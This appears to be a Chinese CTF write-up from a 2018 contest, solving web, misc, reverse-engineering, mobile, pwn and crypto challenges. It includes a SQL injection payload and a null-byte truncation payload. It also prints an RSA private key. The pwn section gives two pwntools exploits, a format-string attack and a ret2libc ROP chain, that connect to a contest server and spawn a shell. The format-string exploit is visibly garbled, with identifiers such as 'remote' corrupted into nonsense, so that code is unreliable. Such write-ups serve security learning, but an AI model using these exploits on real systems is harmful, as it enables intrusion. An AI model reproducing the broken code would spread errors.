By:桂林電子科技大學We_ax戰隊
Web
超簡單
分值:100 類型:WEB 已解決
題目:超簡單的web題 http://gxnnctf.gxsosec.cn:12311/
看到ereg函數,猜測有00截斷漏洞。
後面要求不是數字,又要在白名單裏(0-9之間)
構造payload:?no=1%001。
帽子商城
分值:200 類型:WEB 未解決
題目:有帽子你就能變強,去這買幾頂帽子吧 http://gxnnctf.gxsosec.cn:12313
sql???
分值:200 類型:WEB 已解決
題目:小明想當一名黑客,於是學習寫網站,但他遇到點問題,幫幫他吧
1.Sql注入失敗。
2.Git泄漏文件
3.審計代碼:
在Index中:
代碼要求id對應的username在第一次被檢查的時候是guest
但是在第二次被檢測的時候要是admin
由於沒有屏蔽case,構造如下Payload=“case when @a is null then @a:=2 else 1 end#”
GET傳參 backdoor=Melonrind
url.decode()
id=case+when+% 40a+is+null+then+% 40a% 3a% 3d2+else+1+end% 23&backdoor=Melonrind
Misc
太簡單了
分值:50 類型:MISC 已解決
題目:http://www.gxsosec.cn/resources/uploads/file/20181214/d25ebcc135cad51d4d4b6aca36203a34.zip
flag文件是一個zip文件,修復文件頭。
getflag
misc2
分值:100 類型:MISC 已解決
題目:小明下載資源得時候發現變成了壓縮包,而且他沒有密碼,你們能幫幫他嗎?http://www.gxsosec.cn/resources/uploads/file/20181214/6bce69d2b9b8c62e90f089d86b5a729c.zip
1.CRC碰撞出txt文本內容
2.字符串拼接 base64.decode
這是啥
分值:100 類型:MISC 未解決
題目:
666666(題目文件已更新)
http://www.gxsosec.cn/resources/uploads/file/20181215/0e7a481704ceb84b8ef1904a62f023c0.zip
未知文件
分值:200 類型:MISC 已解決
題目:小明下資源的時候又下回來一個壓縮包,但是他打不開,能幫幫他嗎?
1.十六進制查看,含有Png文件和pyc文件,並導出。
2.pyc反編譯後,我們需要有md5,幾個文件的md5都試了一下
5dde2e3b6a46a5e7ebe6214347f74f9c
caf2311290e2e1809be5cc606b25b98a
a2bac3d666f32aa9848ab758a5f5331d
e353326bb69da25eb88b26c7cefffa14
C++
int main()
{
char md5[] = "a2bac3d666f32aa9848ab758a5f5331d";
//char code[] = "ctf_is_so_hard..";
char check[] = { 59, 106, 36, 41, 115, 33, 54, 63, 99, 42, 52, 120, 38, 38, 115, 40, 00 };
for (int i = 0; i < 16; i++)
{
cout << (char)(md5[i*2]^md5[i*2+1] ^ check[i]) ;
}
system("pause");
return 0;
}
//“hit{stegosaurus}”
給出提示“stegosaurus”,python字節碼隱寫工具。
stegosaurus.py 查看隱寫
gxnnctf{Hldd3n_Tre@sure}
txt
分值:100 類型:MISC 已解決
題目:
小明下載資源又下到了不知道什麼鬼,你能幫幫他嗎
文本中含有 不可視 無長度字符(E2 80 8F)
github項目:https://github.com/offdev/zwsp-steg-js
RE
大佬來破解呀
分值:200 類型:Reverse 未解決
題目:
RAR可是加密的哦
http://www.gxsosec.cn/resources/uploads/file/20181214/f7dd43caf14cb4b781ce76c2240efb7c.rar
USBKey Crack
分值:150 類型:Reverse 已解決
題目:
某單位的系統登錄
http://www.gxsosec.cn/resources/uploads/file/20181214/0390e3155b79279537ab0d39a70ad603.zip
1.dll調用 無殼
2.四個輸出表
審計代碼看到:
sub_10009550()函數中有Login過程
*Str2 = 'D\08';
v17='R\0j';
v18='T\0E';
v19='j\01';
v20='L\0E';
v21='C\0o';
v22='K\0r';
v23='v\0b';
v24='v\0R';
v25='M\0O';
v26='i\0y';
v27='x\0z';
Unicode編碼。
v8 = !StrCmpW(v7, L"admin") && !StrCmpNW(v4, Str2, 24);
查交叉調用,找到
sub_100091B0():
v45='l\0f';
v46='g\0a';
v47='T\0{';
v48='a\0h';
v49='_\0t';
v50='s\0i';
v51='A\0_';
v52='_\0n';
v53='w\0A';
v54='0\0s';
v55='e\0m';
v56='L\0_';
v57='f\0i';
v58='}\0e';
GetFlag
SMC
分值:100 類型:Reverse 已解決
題目:
easy rev
http://www.gxsosec.cn/resources/uploads/file/20181214/8b5b4ee21883d6ee9489e88426b1555f.zip
About binary
1.32位Win.Pe程序2.UPX加殼
Analyze
1.先判斷輸入字符最後一個是否等於'}'
2.異或
int v1[] = { 0xa, 0xf, 0x19, 0x31, 00, 0x14, 0x12, 0xc };
int v2[] = { 0x6d, 0x77, 0x77, 0x5f, 0x63, 0x60, 0x74, 0x77 };
for (int i = 0; i < 8; ++i)
{
cout << (char)(v1[i]^v2[i]);
}
//“gxnnctf{”
3.異或
int v3[] = { 0x3d, 0x0b, 0x5f, 0x08, 0x43 };
for (int i = 0; i < 5; ++i)
{
cout << (char)(v3[i] ^ 0x6e);
}
//“Se1f-”
4.Base64
base64.decode("TTBkaWZ5aW5n")="M0difying"
5.
char v4[] = "ae2fg#";
for (int i = 0; i < 7; ++i)
{
cout << (char)(v4[i]-2);
}
//“_c0de!”
//gxnnctf{Se1f-M0difying_c0de!}
twins
分值:250 類型:Reverse 已解決
題目:
http://www.gxsosec.cn/resources/uploads/file/20181214/8f05779b83a5e68c40c5500b26f21f87.zip
About binary
1.32Bit.Win.Pe2.Upx加殼3.MFC
Analyze
1.Api斷點設置 MessageBox,找到事件
sub_401A90:
v7 = CString::GetBuffer(&v14, 17);
if ( CString::IsEmpty(&v14) )
{
CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
CDialog::EndDialog(v15, 0);
}
if ( CString::GetLength(&v14) != 16 )
{
CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
CDialog::EndDialog(v15, 0);
}
v1 = CString::operator char const *(&v14);
v2 = sub_40100F(&unk_416900, v1);
CString::operator=(&v13, v2);
v6 = CString::GetBuffer(&v13, 33);
for ( i = 0; i < 16; ++i )
{
*(&v8 + 2 * i) = v7[i] / 16 + 48;
v9[2 * i] = v7[i] % 16 + 48;
}
v10 = 0;
for ( j = 0; j < 32; ++j )
{
if ( *(&v8 + j) == v6[j] )
++v11;
}
if ( v11 == 32 )
{
CWnd::MessageBoxA(v15, "Congragulation!", 0, 0);
CDialog::EndDialog(v15, 0);
}
簡化代碼:
char in_str[] = "1234567890123456";
char str2[33] = { 0 };
str2 = String_to_Hex(in_str);
if (strcmp(str2, md5(in_str)))
{
//Congragulation!
}
很難爆破出來,懷疑題目暗藏代碼。
2.查看彙編代碼,找到一個可疑段。題目把其中一個按鈕設爲不可視。
0x00401D10
這裏因爲沒有IDA沒有解析成函數。
CString::CString(&v10);
v73 = 0;
CString::CString(&v9);
LOBYTE(v73) = 1;
CWnd::GetWindowTextA((v72 + 96), &v10);
v1 = CString::operator char const *(&v10);
v2 = sub_40100F(&unk_416900, v1);
CString::operator=(&v9, v2);
v8 = CString::GetBuffer(&v10, 18);
for ( i = 0; i < 32; ++i )
*(&v12 + i) ^= v11;
v44 = 0;
if ( operator!=(&v9, &v12) )
{
CDialog::EndDialog(v72, 0);
}
else
{
for ( j = 0; j < 27; ++j )
v6[j] = *(&v45 + j) ^ v8[(j + 2) % 17];
v7 = 0;
CWnd::MessageBoxA(v72, v6, 0, 0);
CDialog::EndDialog(v72, 0);
}
LOBYTE(v73) = 0;
CString::~CString(&v9);
v73 = -1;
return CString::~CString(&v10);
}
附C++代碼:
int v45[] = { 20, 11, 25, 1, 17, 16, 86, 74, 118, 90, 85, 89, 89, 80, 80, 17, 18, 7, 4, 24, 13, 7, 16, 68, 94, 92, 78 };
int v12[] = { 8, 12, 95, 14, 83, 88, 91, 14, 88, 12, 91, 82, 15, 15, 89, 90, 93, 93, 92, 82, 89, 14, 92, 15, 89, 14, 94, 90, 93, 11, 12, 8, 0, 106 };
char input[] = "password0123456789";
int v11 = 106;
char v6[27];
for (int i = 0; i < 32; ++i)
{
v12[i] ^= v11;
cout << (char)v12[i] ;
}
cout << endl;
for (int j = 0; j < 27; ++j)
{
v6[j] = v45[j] ^ input[(j + 2) % 17];
cout << (char)v6[j];
}
cout << endl;
Return:
md5_code="bf5d921d2f18ee3077683d6e3d407afb"
mad_decode="password0123456789"
flag="gxnnctf{Dialoghastwobutton}"
Debug
分值:150 類型:Reverse 已解決
題目:
http://www.gxsosec.cn/resources/uploads/file/20181215/cbe109be7e440066d5d393246eca7aa3.zip
1.損壞Elf文件
2.審計彙編。
3.sub_80484C0()函數
for ( i = 0; i <= 26; ++i )
*(&v13 + i) ^= *(&v5 + 4 * (i % 3));
for ( j = 0; j <= 26; ++j )
{
if ( *(&v13 + j) <= 47 || *(&v13 + j) > 57 )
{
if ( *(&v13 + j) <= 64 || *(&v13 + j) > 90 )
{
if ( *(&v13 + j) <= 96 || *(&v13 + j) > 122 )
v11[j] = *(&v13 + j) + 1;
else
v11[j] = *(&v13 + j) - 32;
}
else
{
v11[j] = *(&v13 + j) + 32;
}
}
else
{
v11[j] = (*(&v13 + j) - 53) % 10 + 48;
}
}
C++代碼:
__int8 v13[] = { -55, 66, -118, -64, 89, -112, -56, 96, -91, -36, 95, -102, -41, 47, -111, -48, 79, -105, -72, 84, -125, -48, 93, -128, -52, 36, -72, 0 };
__int8 v41[] = { -15, -23, -109, -41, -28, -42, -52, -14, -42, -60, -95, -102, -52, -11, -126, -55, -28, -42, -57, -24, -126, -123, -10, -124, -54, -17, -111, -124, -117, 0 };
int v5[] = { 142, 26, 196 };
int v8[] = { 165, 129, 246 };
char v11[27] = { 0 };
for (int i = 0; i <= 26; ++i)
{
v13[i] ^= v5[(i % 3)];
}
for (int j = 0; j <= 26; ++j)
{
if (v13[j] <= '/' || v13[j] > '9')
{
if (v13[j] <= '@' || v13[j] > 'Z')
{
if (v13[j] <= '`' || v13[j] >= 'z')//這裏改了一下
v11[j] = v13[j] + 1;
else
v11[j] = v13[j] - 32;
}
else
{
v11[j] = v13[j] + 32;
}
}
else
{
v11[j] = (v13[j] - 53) % 10 + 48;
}
}
for (int i = 0; i < 27; i++)
{
cout << v11[i];
}
system("pause");
gxnnctf{Are_y0u_us1ng_gdb?}
solving
分值:300 類型:Reverse 已解決
題目:
http://www.gxsosec.cn/resources/uploads/file/20181216/25af80b15e8c3d3a1f6fd4227bca9386.zip
用ida打開
查看字符串很有意思
目測做過
詳細解題過程以前發過帖子
https://www.52pojie.cn/thread-800582-1-1.html
gxnnctf{logged_in_my_reverse}
Mobile
常規加密算法
分值:300 類型:Android 已解決
題目:
http://www.gxsosec.cn/resources/uploads/file/20181214/3cb21e0554e84959d845ae493ff74e7b.zip
1.Twofish算法
Twofish_setup(T,"faQW1ZKVGhmD7K1uWB9Q0fwP",192)
Twofish_decryt(T, 99CEE869E3BF3E61927FA66123ABAFD9h, &Result);
Result=“it_w@3_n0t_kn0wn”
2.So動態調試
在Twofish_setup後 jmp 到Twofish_decryt(v10, &v12, &v15);
或者
改call __Z14Twofish_decrytP9twofish_tPhS1_
push eax push eax
第二次壓棧的內容
OS_200
分值:200 類型:IOS 已解決
題目:
http://www.gxsosec.cn/resources/uploads/file/20181214/fdcb879f4a93a490581a9433ae2fc68a.zip
ida打開
看見函數中 Rsa_decode
if ( v9 & 1 )
{
v10 = objc_msgSend(&OBJC_CLASS___UIAlertView, "alloc");
v11 = ((id (__cdecl *)(RSA_meta *, SEL, id, id))objc_msgSend)(
(RSA_meta *)&OBJC_CLASS___RSA,
"decryptString:privateKey:",
(id)flag,
(id)privkey);
v12 = objc_retainAutoreleasedReturnValue((__int64)v11);
v15 = objc_msgSend(
v10,
"initWithTitle:message:delegate:cancelButtonTitle:otherButtonTitles:",
CFSTR("info"),
v12,
0LL,
CFSTR("ok"),
0LL);
objc_release(v12);
objc_msgSend(v15, "show");
objc_storeStrong(&v15, 0LL);
}
tVeemPfsMFeRTEabVJCZyVgj01+uNBrgziTdG6RaJI/UiVNFBZW2mcpkLIWUgqDxw8TQZx+WXQhX+To4auZKSGfG5LL2jnBElSjgUGGwNWM7BYiKERF7oAnOP3KNn2JeFThmYclyATUX//OmnzEp7bOgdr5CvmV2IEa3DFG7tDY=
私鑰:
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAMMjZu9UtVitvgHS
tpmAU/rRVdhy9GaT2rnpCJOYSb0deVI+rXPKHI9Aca2LkWiRgkzM1wqbRvAvWrqK
gm4PgQUjnoNr7vRd1HPUKNA9ATfJetddW86yar0ux3FMVaxUFN6F0KatqkplVXHo
8qXubKHRx9dCbK95P96rJkrWBiO9AgMBAAECgYBO1UKEdYg9pxMX0XSLVtiWf3Na
2jX6Ksk2Sfp5BhDkIcAdhcy09nXLOZGzNqsrv30QYcCOPGTQK5FPwx0mMYVBRAdo
OLYp7NzxW/File//169O3ZFpkZ7MF0I2oQcNGTpMCUpaY6xMmxqN22INgi8SHp3w
VU+2bRMLDXEc/MOmAQJBAP+Sv6JdkrY+7WGuQN5O5PjsB15lOGcr4vcfz4vAQ/uy
EGYZh6IO2Eu0lW6sw2x6uRg0c6hMiFEJcO89qlH/B10CQQDDdtGrzXWVG457vA27
kpduDpM6BQWTX6wYV9zRlcYYMFHwAQkE0BTvIYde2il6DKGyzokgI6zQyhgtRJ1x
L6fhAkB9NvvW4/uWeLw7CHHVuVersZBmqjb5LWJU62v3L2rfbT1lmIqAVr+YT9CK
2fAhPPtkpYYo5d4/vd1sCY1iAQ4tAkEAm2yPrJzjMn2G/ry57rzRzKGqUChOFrGs
lm7HF6CQtAs4HC+2jC0peDyg97th37rLmPLB9txnPl50ewpkZuwOAQJBAM/eJnFw
F5QAcL4CYDbfBKocx82VX/pFXng50T7FODiWbbL4UnxICE0UBFInNNiWJxNEb6jL
5xd0pcy9O2DOeso=
解密得
flag{H01id@y_h@ck_ch@11enge}
Basic
Her Majesty Queen Elizabeth II
分值:50 類型:Basic 未解決
題目:
基礎題:FE&pd8dMFLR%)(DsGbhi@/dKPNR'*TUm?\tlr.7RV
PWN
format
分值:200 類型:PWN 未解決
題目:host:47.106.209.151 port:44444
1.Blind Pwn。
2.Fotmat While循環格式化字符串利用。
3.由於網速太慢,Dump失敗。
4.查看棧上地址
for i in range(0,500):
p.sendline("%"+str(i)+"p")
raw_input()
我們發現在260+ 位置會出現libc地址。
5.在printf執行過程中會出現vprintf函數。控制這個跳轉即可。
exp:
from pwn import*
context.log_level = 'debug'
p = rlibcmotlibc( '47.106.209.151',44444)
libc = ELF("./x86_libc.so.6")
payload = '%267$p'
p.sendline(payload)
libc_baslibc = int(p.recv(),16) - 0x18637
system_libc_addr = libc_baslibc + libc.symbols["system"]
p.sendline("%p")
stack = int(p.recv(),16)
onlibc = 0x3a812 + libc_baslibc
payload=fmtstr_payload(7,{stack-4*8:system_libc_addr,stack-4*6:stack+0x100},writlibc_sizlibc='bytlibc')
payload=payload.ljust(0x100)+'/bin/sh\x00'
p.sendline(payload)
p.interactive()
x64
分值:200 類型:PWN 已解決
題目:host:47.106.209.151 port:55555http://www.gxsosec.cn/resources/uploads/file/20181215/d77a475ff316855b5931fbe19ab28168.zip
exp:
from pwn import *
context.log_level="debug"
p=remote("47.106.209.151",55555)#process("./pwn")
elf=ELF("./pwn")
libc=ELF("./x64_libc.so.6")
write_got=elf.got["write"]
print hex(write_got)
p.recv()
raw_input()
payload="a"*(8*16+8)+p64(0x0040062a)+p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)+p64(0x00400610)+56*'a'+p64(0x0040059d)
p.sendline(payload)
str1=p.recv()[0:8]
write_got_addr=u64(str1)
system_addr=write_got_addr-libc.symbols["write"]+libc.symbols["system"]
binsh_addr=write_got_addr-libc.symbols["write"]+next(libc.search("/bin/sh"))
print hex(system_addr)
print hex(binsh_addr)
payload="a"*(8*16+8)+p64(0x0000000000400633)+p64(binsh_addr)+p64(system_addr)+p64(0x0040059d)
p.sendline(payload)
p.interactive()
Crypto
維吉尼亞遇上困難
分值:200 類型:Crypto 已解決
題目:
BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQUBDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZGXNBAXLGGWBLTLWCKOXAR
維吉尼亞解密:
THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGYFLAGISYOUARESOKINDLY
FLAG IS YOU ARE SOKINDLY
shamir重要數據損壞
分值:150 類型:Crypto 已解決
題目:
某集團總裁Shamir將自己使用的筆記本電腦上重要的祕密數據分割成5份子祕密數據,並分別存放在5個存儲設備上,其中可以由至少3份子祕密數據聯合參與運算,才能重構原來的祕密數據。分割方案使用的參數模數爲5987。由於Shamir使用的筆記本電腦感染病毒致使該重要祕密數據損壞無法修復,於是Shamir讓技術人員通過存放在編號爲5、7、9的三個存儲設備的子祕密數據進行重構重要祕密數據,其中編號5的存儲設備存放的數據爲(5,2258)、編號爲7的存儲設備存放的數據爲(7,2424)、編號爲9的存儲設備存放的數據爲(9,2630)。請問技術人員重構出來的重要祕密數據是多少?提示:多項式f(x) x=5 7 9
谷歌Shamir(k,n) 找到解密方法
https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing#Reconstruction
列出
D0 = (5, 2258) D1 = (7, 2424) D2 = (9, 2630)
得到
t0 = ((x-9)/(5-9))*((x-7)/(5-7))
t1 = ((x-9)/(7-9))*((x-5)/(7-5))
t2 = ((x-5)/(9-5))*((x-7)/(9-7))
f(x)∑=2018+9055x+5x^2
key:2018